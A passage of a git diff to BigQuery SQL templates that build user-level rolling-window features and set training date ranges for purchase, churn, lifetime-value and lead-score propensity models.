interval_min_date +SET min_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL {{interval_min_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + +-- If min_date > maximum event_date OR max_date < minimum event_date, then set min_date for the max event_date and set max_date for the min event_date +IF min_date >= (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR max_date <= (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date >= max_date THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This code block acts as a safeguard to ensure that the min_date and max_date used for further analysis are always within the bounds of the actual data available in the table. +-- It prevents situations where calculations might mistakenly consider dates beyond the real data range, which could lead to errors or misleading results. 
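-- A concrete walk-through of the date clamping in this script, assuming the event table spans
-- 2024-01-01 through 2024-03-31 with interval_min_date = 60 and interval_max_date = 60 (values
-- chosen only for illustration):
SELECT
  DATE_ADD(DATE '2024-01-01', INTERVAL 60 DAY) AS computed_min_date,  -- 2024-03-01
  DATE_SUB(DATE '2024-03-31', INTERVAL 60 DAY) AS computed_max_date;  -- 2024-01-31
-- Here computed_min_date >= computed_max_date, so the guards reset both variables to the table
-- bounds (2024-01-01 and 2024-03-31); the block below additionally resets them whenever either
-- date drifts outside the range actually present in the data.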
+IF max_date > (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date < (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This section determines the date range for analysis and creates a temporary table dates_interval with distinct date intervals. +CREATE OR REPLACE TEMP TABLE dates_interval as ( + SELECT DISTINCT + -- Select each distinct event_date as 'input_date', representing the current date in the analysis + event_date as input_date, + -- Calculate the 'end_date' by subtracting a specified interval from the 'input_date' + DATE_SUB(event_date, INTERVAL {{interval_end_date}} DAY) as end_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` + WHERE event_date BETWEEN min_date AND max_date + ORDER BY input_date DESC +); + +{% for feature in short_list_features %} +-- Run these windows aggregations every day. For each date in training and inference date ranges. +-- All users metrics: 1–5-day {{feature.feature_name}} users +CREATE OR REPLACE TEMP TABLE rolling_{{feature.feature_name}}_past_days AS ( + SELECT + user_pseudo_id, + input_date as feature_date, + -- Number of times the user has {{feature.feature_name}} in the past 1st day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 1 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_1_day, + -- Number of times the user has {{feature.feature_name}} in the past 2nd day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 2 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_2_day, + -- Number of times the user has {{feature.feature_name}} in the past 3rd day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 3 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_3_day, + -- Number of times the user has {{feature.feature_name}} in the past 4th day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 4 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_4_day, + -- Number of times the user has {{feature.feature_name}} in the past 5th day + MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date, event_date, DAY) = 5 WHEN TRUE THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{feature.feature_name}}_past_5_day + FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E + CROSS JOIN dates_interval as DI + -- Filter events to be within the defined date range + WHERE E.event_date BETWEEN DI.end_date AND DI.input_date + -- Filter for {{feature.feature_name}} events + AND event_name='{{feature.feature_name}}' + -- Ensure valid session ID + AND ga_session_id IS NOT NULL + -- Group the results by user pseudo ID and feature date + GROUP BY user_pseudo_id, feature_date +); + +{% endfor %} + +-- All users in the platform +-- This code creates a temporary table that contains a distinct list of user pseudo IDs +-- and their corresponding feature dates, filtering for events with valid session IDs, +-- device operating systems, and falling within the specified date range. 
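-- For illustration: the CROSS JOIN with `dates_interval` used here and in the rolling-window
-- tables above enumerates (user, feature_date) pairs, giving the final FULL OUTER JOINs a
-- complete spine to attach per-day counts to, with COALESCE filling in zeros. A minimal sketch
-- of that scaffold; `my_events` is a hypothetical table, not one defined by this repository.
SELECT
  u.user_pseudo_id,
  d.input_date AS feature_date
FROM (SELECT DISTINCT user_pseudo_id FROM my_events) AS u
CROSS JOIN (SELECT DISTINCT event_date AS input_date FROM my_events) AS d;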
+CREATE OR REPLACE TEMP TABLE events_users as (
+  SELECT DISTINCT
+  Users.user_pseudo_id,
+  DI.input_date as feature_date
+  FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users
+  INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D
+  ON Users.device_type_id = D.device_type_id
+  CROSS JOIN dates_interval as DI
+  WHERE Users.ga_session_id IS NOT NULL
+  AND Users.event_date BETWEEN DI.end_date AND DI.input_date
+  AND D.device_os IS NOT NULL
+);
+
+-- This code block inserts data into a table, combining information from the events_users
+-- table and several temporary tables containing rolling window features. The resulting data
+-- represents user-level features for each user and date, capturing their past activity within
+-- different time windows.
+INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` (
+  processed_timestamp,
+  feature_date,
+  user_pseudo_id{% for feature in short_list_features %},
+  {{feature.feature_name}}_past_1_day,
+  {{feature.feature_name}}_past_2_day,
+  {{feature.feature_name}}_past_3_day,
+  {{feature.feature_name}}_past_4_day,
+  {{feature.feature_name}}_past_5_day{% endfor %}
+)
+  SELECT DISTINCT
+    -- This selects the current timestamp and assigns it to the column processed_timestamp.
+    CURRENT_TIMESTAMP() AS processed_timestamp,
+    EUD.feature_date,
+    EUD.user_pseudo_id{% for feature in short_list_features %},
+    COALESCE({{feature.feature_name}}_past_1_day,0) AS {{feature.feature_name}}_past_1_day,
+    COALESCE({{feature.feature_name}}_past_2_day,0) AS {{feature.feature_name}}_past_2_day,
+    COALESCE({{feature.feature_name}}_past_3_day,0) AS {{feature.feature_name}}_past_3_day,
+    COALESCE({{feature.feature_name}}_past_4_day,0) AS {{feature.feature_name}}_past_4_day,
+    COALESCE({{feature.feature_name}}_past_5_day,0) AS {{feature.feature_name}}_past_5_day{% endfor %}
+  FROM events_users AS EUD{% for feature in short_list_features %}
+  FULL OUTER JOIN rolling_{{feature.feature_name}}_past_days AS {{feature.feature_name}}
+  ON EUD.user_pseudo_id = {{feature.feature_name}}.user_pseudo_id AND EUD.feature_date = {{feature.feature_name}}.feature_date{% endfor %}
+  -- This filters the results to include only rows where the user_pseudo_id is not null.
+  WHERE EUD.user_pseudo_id IS NOT NULL
+  ;
\ No newline at end of file
diff --git a/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx b/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx
index 2ee219f1..b4a0a415 100644
--- a/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx
+++ b/sql/query/invoke_backfill_user_rolling_window_lifetime_metrics.sqlx
@@ -283,7 +283,50 @@ AND D.device_os IS NOT NULL
 -- This code is part of a larger process for building a machine learning model that predicts
 -- user behavior based on their past activity. The features generated by this code can be used
 -- as input to the model, helping it learn patterns and make predictions.
-INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + active_users_past_1_30_day, + active_users_past_30_60_day, + active_users_past_60_90_day, + active_users_past_90_120_day, + active_users_past_120_150_day, + active_users_past_150_180_day, + purchases_past_1_30_day, + purchases_past_30_60_day, + purchases_past_60_90_day, + purchases_past_90_120_day, + purchases_past_120_150_day, + purchases_past_150_180_day, + visits_past_1_30_day, + visits_past_30_60_day, + visits_past_60_90_day, + visits_past_90_120_day, + visits_past_120_150_day, + visits_past_150_180_day, + view_items_past_1_30_day, + view_items_past_30_60_day, + view_items_past_60_90_day, + view_items_past_90_120_day, + view_items_past_120_150_day, + view_items_past_150_180_day, + add_to_carts_past_1_30_day, + add_to_carts_past_30_60_day, + add_to_carts_past_60_90_day, + add_to_carts_past_90_120_day, + add_to_carts_past_120_150_day, + add_to_carts_past_150_180_day, + checkouts_past_1_30_day, + checkouts_past_30_60_day, + checkouts_past_60_90_day, + checkouts_past_90_120_day, + checkouts_past_120_150_day, + checkouts_past_150_180_day, + ltv_revenue_past_1_30_day, + ltv_revenue_past_30_90_day, + ltv_revenue_past_90_180_day +) SELECT DISTINCT -- This selects the current timestamp and assigns it to the column processed_timestamp. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx b/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx index 9317225a..be0a0860 100644 --- a/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx +++ b/sql/query/invoke_backfill_user_rolling_window_metrics.sqlx @@ -272,7 +272,65 @@ CREATE OR REPLACE TEMP TABLE events_users as ( -- table and several temporary tables containing rolling window features. The resulting data -- represents user-level features for each user and date, capturing their past activity within -- different time windows. 
-INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + active_users_past_1_day, + active_users_past_2_day, + active_users_past_3_day, + active_users_past_4_day, + active_users_past_5_day, + active_users_past_6_day, + active_users_past_7_day, + active_users_past_8_14_day, + active_users_past_15_30_day, + purchases_past_1_day, + purchases_past_2_day, + purchases_past_3_day, + purchases_past_4_day, + purchases_past_5_day, + purchases_past_6_day, + purchases_past_7_day, + purchases_past_8_14_day, + purchases_past_15_30_day, + visits_past_1_day, + visits_past_2_day, + visits_past_3_day, + visits_past_4_day, + visits_past_5_day, + visits_past_6_day, + visits_past_7_day, + visits_past_8_14_day, + visits_past_15_30_day, + view_items_past_1_day, + view_items_past_2_day, + view_items_past_3_day, + view_items_past_4_day, + view_items_past_5_day, + view_items_past_6_day, + view_items_past_7_day, + view_items_past_8_14_day, + view_items_past_15_30_day, + add_to_carts_past_1_day, + add_to_carts_past_2_day, + add_to_carts_past_3_day, + add_to_carts_past_4_day, + add_to_carts_past_5_day, + add_to_carts_past_6_day, + add_to_carts_past_7_day, + add_to_carts_past_8_14_day, + add_to_carts_past_15_30_day, + checkouts_past_1_day, + checkouts_past_2_day, + checkouts_past_3_day, + checkouts_past_4_day, + checkouts_past_5_day, + checkouts_past_6_day, + checkouts_past_7_day, + checkouts_past_8_14_day, + checkouts_past_15_30_day +) SELECT DISTINCT -- This selects the current timestamp and assigns it to the column processed_timestamp. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx b/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx index bfb93869..ed4bf30e 100644 --- a/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx +++ b/sql/query/invoke_backfill_user_scoped_lifetime_metrics.sqlx @@ -163,7 +163,35 @@ CREATE OR REPLACE TEMP TABLE first_purchasers as ( ); -- This SQL code calculates various user engagement and revenue metrics at a daily level and inserts the results into a target table. It leverages several temporary tables created earlier in the script to aggregate data efficiently. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + lifetime_purchasers_users, + lifetime_average_daily_purchasers, + lifetime_active_users, + lifetime_DAU, + lifetime_MAU, + lifetime_WAU, + lifetime_dau_per_mau, + lifetime_dau_per_wau, + lifetime_wau_per_mau, + lifetime_users_engagement_duration_seconds, + lifetime_average_engagement_time, + lifetime_average_engagement_time_per_session, + lifetime_average_sessions_per_user, + lifetime_ARPPU, + lifetime_ARPU, + lifetime_average_daily_revenue, + lifetime_max_daily_revenue, + lifetime_min_daily_revenue, + lifetime_new_users, + lifetime_returning_users, + lifetime_first_time_purchasers, + lifetime_first_time_purchaser_conversion, + lifetime_first_time_purchasers_per_new_user, + lifetime_avg_user_conversion_rate, + lifetime_avg_session_conversion_rate +) SELECT -- Records the current timestamp when the query is executed. 
CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_scoped_metrics.sqlx b/sql/query/invoke_backfill_user_scoped_metrics.sqlx index 3cc45b49..c5252519 100644 --- a/sql/query/invoke_backfill_user_scoped_metrics.sqlx +++ b/sql/query/invoke_backfill_user_scoped_metrics.sqlx @@ -183,7 +183,35 @@ CREATE OR REPLACE TEMP TABLE new_users_ as ( ); -- Insert data into the target table after calculating various user engagement and revenue metrics. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + purchasers_users, + average_daily_purchasers, + active_users, + DAU, + MAU, + WAU, + dau_per_mau, + dau_per_wau, + wau_per_mau, + users_engagement_duration_seconds, + average_engagement_time, + average_engagement_time_per_session, + average_sessions_per_user, + ARPPU, + ARPU, + average_daily_revenue, + max_daily_revenue, + min_daily_revenue, + new_users, + returning_users, + first_time_purchasers, + first_time_purchaser_conversion, + first_time_purchasers_per_new_user, + avg_user_conversion_rate, + avg_session_conversion_rate +) SELECT DISTINCT -- Record the current timestamp when the query is executed. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx b/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx index c6f03aaa..251dfead 100644 --- a/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx +++ b/sql/query/invoke_backfill_user_scoped_segmentation_metrics.sqlx @@ -136,7 +136,35 @@ GROUP BY feature_date ); -- This SQL code calculates various user engagement and revenue metrics at a daily level and inserts the results into a target table. It leverages several temporary tables created earlier in the script to aggregate data efficiently. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + purchasers_users, + average_daily_purchasers, + active_users, + DAU, + MAU, + WAU, + dau_per_mau, + dau_per_wau, + wau_per_mau, + users_engagement_duration_seconds, + average_engagement_time, + average_engagement_time_per_session, + average_sessions_per_user, + ARPPU, + ARPU, + average_daily_revenue, + max_daily_revenue, + min_daily_revenue, + new_users, + returning_users, + first_time_purchasers, + first_time_purchaser_conversion, + first_time_purchasers_per_new_user, + avg_user_conversion_rate, + avg_session_conversion_rate +) SELECT -- Records the current timestamp when the query is executed. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx b/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx index be402415..cf2dc7ff 100644 --- a/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx +++ b/sql/query/invoke_backfill_user_segmentation_dimensions.sqlx @@ -95,7 +95,31 @@ CREATE OR REPLACE TEMP TABLE events_users as ( -- This code snippet performs a complex aggregation and insertion operation. It combines data from two temporary tables, -- calculates various user-level dimensions, and inserts the aggregated results into a target table. The use of window functions, -- approximate aggregation, and careful joining ensures that the query is efficient and produces meaningful insights from the data. 
-INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id +) -- The DISTINCT keyword ensures that only unique rows are inserted, eliminating any potential duplicates. SELECT DISTINCT CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx b/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx index 7ba0e2f7..4c6f3373 100644 --- a/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx +++ b/sql/query/invoke_backfill_user_session_event_aggregated_metrics.sqlx @@ -354,7 +354,45 @@ CREATE OR REPLACE TEMP TABLE events_users_days as ( -- user_events_per_day_event_scoped (UEPDES): Contains user-level event metrics aggregated on a daily basis. Metrics include add_to_carts, cart_to_view_rate, checkouts, ecommerce_purchases, etc. -- repeated_purchase (R): Stores information about whether a user has made previous purchases, indicated by the how_many_purchased_before column. -- cart_to_purchase (CP): Contains a flag (has_abandoned_cart) indicating whether a user abandoned their cart on a given day. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + engagement_rate, + engaged_sessions_per_user, + session_conversion_rate, + bounces, + bounce_rate_per_user, + sessions_per_user, + avg_views_per_session, + sum_engagement_time_seconds, + avg_engagement_time_seconds, + new_visits, + returning_visits, + add_to_carts, + cart_to_view_rate, + checkouts, + ecommerce_purchases, + ecommerce_quantity, + ecommerce_revenue, + item_revenue, + item_quantity, + item_refund_amount, + item_view_events, + items_clicked_in_promotion, + items_clicked_in_list, + items_checked_out, + items_added_to_cart, + item_list_click_events, + item_list_view_events, + purchase_revenue, + purchase_to_view_rate, + refunds, + transactions_per_purchaser, + user_conversion_rate, + how_many_purchased_before, + has_abandoned_cart +) SELECT CURRENT_TIMESTAMP() AS processed_timestamp, EUD.feature_date, diff --git a/sql/query/invoke_churn_propensity_training_preparation.sqlx b/sql/query/invoke_churn_propensity_training_preparation.sqlx index 632fb03b..10a48ef4 100644 --- a/sql/query/invoke_churn_propensity_training_preparation.sqlx +++ b/sql/query/invoke_churn_propensity_training_preparation.sqlx @@ -57,14 +57,14 @@ SET churners = (SELECT COUNT(DISTINCT user_pseudo_id) ); -- Setting Training Dates --- If there are churners in the training set, then keep the user-defined dates, or else set --- the start and end dates instead. +-- If there are churners in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. 
IF churners > 0 THEN - SET train_start_date = GREATEST(train_start_date, min_date); - SET train_end_date = LEAST(train_end_date, max_date); -ELSE SET train_start_date = min_date; SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); END IF; -- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. diff --git a/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx b/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx index 597dcac8..cfbad806 100644 --- a/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx +++ b/sql/query/invoke_customer_lifetime_value_training_preparation.sqlx @@ -54,17 +54,18 @@ SET validation_split_end_number = {{validation_split_end_number}}; -- IF there are no users in the time interval selected, then set "train_start_date" and "train_end_date" as "max_date" and "min_date". SET purchasers = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{mds_project_id}}.{{mds_dataset}}.event` - WHERE event_date BETWEEN train_start_date AND train_end_date + WHERE event_date BETWEEN min_date AND max_date ); --- If there are purchasers no changes to the train_start_date and train_end_date --- Else, expand the interval, hopefully a purchaser will be in the interval +-- Setting Training Dates +-- If there are churners in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. IF purchasers > 0 THEN - SET train_start_date = train_start_date; - SET train_end_date = train_end_date; -ELSE SET train_start_date = min_date; SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); END IF; -- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. This stored procedure likely handles the actual data preparation for the model. diff --git a/sql/query/invoke_lead_score_propensity_inference_preparation.sqlx b/sql/query/invoke_lead_score_propensity_inference_preparation.sqlx new file mode 100644 index 00000000..54e937d7 --- /dev/null +++ b/sql/query/invoke_lead_score_propensity_inference_preparation.sqlx @@ -0,0 +1,23 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script determines the current date and then passes it as an argument to a +-- stored procedure in your BigQuery project. This pattern is commonly used when +-- you want a stored procedure to perform operations or calculations that are +-- relevant to the current date, such as data processing, analysis, or reporting tasks. 
+ +DECLARE inference_date DATE DEFAULT NULL; +SET inference_date = CURRENT_DATE(); + +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(inference_date); diff --git a/sql/query/invoke_lead_score_propensity_label.sqlx b/sql/query/invoke_lead_score_propensity_label.sqlx new file mode 100644 index 00000000..f4288278 --- /dev/null +++ b/sql/query/invoke_lead_score_propensity_label.sqlx @@ -0,0 +1,39 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script sets up a date range, calls a stored procedure with this range and a variable to +-- store a result, and then returns the result of the stored procedure. This pattern is common +-- for orchestrating data processing tasks within BigQuery using stored procedures. + +DECLARE input_date DATE; +DECLARE end_date DATE; +DECLARE users_added INT64 DEFAULT NULL; + +SET end_date= CURRENT_DATE(); +SET input_date= (SELECT DATE_SUB(end_date, INTERVAL {{interval_input_date}} DAY)); + +-- This code block ensures that the end_date used in subsequent operations is not later than one day after the latest available data in +-- the specified events table. This prevents potential attempts to process data for a date range that extends beyond the actual data availability. +IF (SELECT DATE_SUB(end_date, INTERVAL 1 DAY)) > (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET end_date = (SELECT DATE_ADD(MAX(event_date), INTERVAL 1 DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This code block ensures that the input_date used in subsequent operations is not before the earliest available data in the +-- specified events table. This prevents potential errors or unexpected behavior that might occur when trying to process data +-- for a date range that precedes the actual data availability. +IF input_date < (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET input_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL 1 DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(input_date, end_date, users_added); \ No newline at end of file diff --git a/sql/query/invoke_lead_score_propensity_training_preparation.sqlx b/sql/query/invoke_lead_score_propensity_training_preparation.sqlx new file mode 100644 index 00000000..3d515348 --- /dev/null +++ b/sql/query/invoke_lead_score_propensity_training_preparation.sqlx @@ -0,0 +1,73 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This script intelligently determines the optimal date range for training a purchase +-- propensity model by considering user-defined parameters and the availability of purchase +-- events within the dataset. It ensures that the training data includes purchase events if +-- they exist within the specified bounds. + +-- Intended start and end dates for training data +-- Initializing Training Dates +DECLARE train_start_date DATE DEFAULT NULL; +DECLARE train_end_date DATE DEFAULT NULL; + +-- Control data splitting for training and validation (likely used in a subsequent process). +DECLARE train_split_end_number INT64 DEFAULT NULL; +DECLARE validation_split_end_number INT64 DEFAULT NULL; + +-- Will store the count of distinct users who made a {{target_event}} within a given period. +DECLARE {{target_event}}_users INT64 DEFAULT NULL; + +-- Used to store the maximum and minimum event dates from the source data. +DECLARE max_date DATE; +DECLARE min_date DATE; + +-- Determining Maximum and Minimum Dates +SET max_date = (SELECT DATE_SUB(MAX(event_date), INTERVAL {{interval_max_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +SET min_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL {{interval_min_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + +-- If min_date > maximum event_date OR max_date < minimum event_date, then set min_date for the min event_date and set max_date for the max event_date +IF min_date >= (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR max_date <= (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date >= max_date THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- Setting Split Numbers +-- Sets the train_split_end_number to a user-defined value. This value likely determines the proportion of data used for training. +SET train_split_end_number = {{train_split_end_number}}; -- If you want 60% for training use number 5. If you want 80% use number 7. +-- Sets the validation_split_end_number to a user-defined value, controlling the proportion of data used for validation. +SET validation_split_end_number = {{validation_split_end_number}}; + +-- This crucial step counts distinct users who have an event named '{{target_event}}' within the initially set training date range. +-- IF there are no users with {{target_event}} event in the time interval selected, then set "train_start_date" and "train_end_date" as "max_date" and "min_date". +SET {{target_event}}_users = (SELECT COUNT(DISTINCT user_pseudo_id) + FROM `{{mds_project_id}}.{{mds_dataset}}.event` + WHERE event_name = '{{target_event}}' AND + event_date BETWEEN min_date AND max_date + ); + +-- Setting Training Dates +-- If there are {{target_event}}_users in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. 
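-- For illustration: when no '{{target_event}}' users are found, the ELSE branch below pins the
-- training window to a fixed range so the downstream stored procedure never receives NULL dates.
-- For example, run on 2024-06-15 (a hypothetical date) the fallback window would be:
SELECT
  DATE_SUB(DATE '2024-06-15', INTERVAL 3 YEAR) AS fallback_train_start_date,  -- 2021-06-15
  DATE_SUB(DATE '2024-06-15', INTERVAL 5 DAY) AS fallback_train_end_date;     -- 2024-06-10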
+IF {{target_event}}_users > 0 THEN + SET train_start_date = min_date; + SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); +END IF; + +-- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. This stored procedure +-- handles the actual data preparation for the lead score propensity model. +CALL `{{project_id}}.{{dataset}}.{{stored_procedure}}`(train_start_date, train_end_date, train_split_end_number, validation_split_end_number); diff --git a/sql/query/invoke_purchase_propensity_training_preparation.sqlx b/sql/query/invoke_purchase_propensity_training_preparation.sqlx index 4d2eab86..b8738465 100644 --- a/sql/query/invoke_purchase_propensity_training_preparation.sqlx +++ b/sql/query/invoke_purchase_propensity_training_preparation.sqlx @@ -54,17 +54,18 @@ SET validation_split_end_number = {{validation_split_end_number}}; SET purchasers = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{mds_project_id}}.{{mds_dataset}}.event` WHERE event_name = 'purchase' AND - event_date BETWEEN train_start_date AND train_end_date + event_date BETWEEN min_date AND max_date ); --- If there are purchasers no changes to the train_start_date and train_end_date --- Else, expand the interval, hopefully a purchaser will be in the interval +-- Setting Training Dates +-- If there are purchasers in the training set, then keep the calculated dates, or else set +-- the start and end dates to a fixed interval preventing `train_start_date` and `train_end_date` from being NULL. IF purchasers > 0 THEN - SET train_start_date = GREATEST(train_start_date, min_date); - SET train_end_date = LEAST(train_end_date, max_date); -ELSE SET train_start_date = min_date; SET train_end_date = max_date; +ELSE + SET train_start_date = DATE_SUB(CURRENT_DATE(), INTERVAL 3 YEAR); + SET train_end_date = DATE_SUB(CURRENT_DATE(), INTERVAL 5 DAY); END IF; -- Finally, the script calls a stored procedure, passing the adjusted training dates and split numbers as arguments. This stored procedure diff --git a/sql/query/invoke_user_rolling_window_lead_metrics.sqlx b/sql/query/invoke_user_rolling_window_lead_metrics.sqlx new file mode 100644 index 00000000..e469a2d7 --- /dev/null +++ b/sql/query/invoke_user_rolling_window_lead_metrics.sqlx @@ -0,0 +1,28 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" 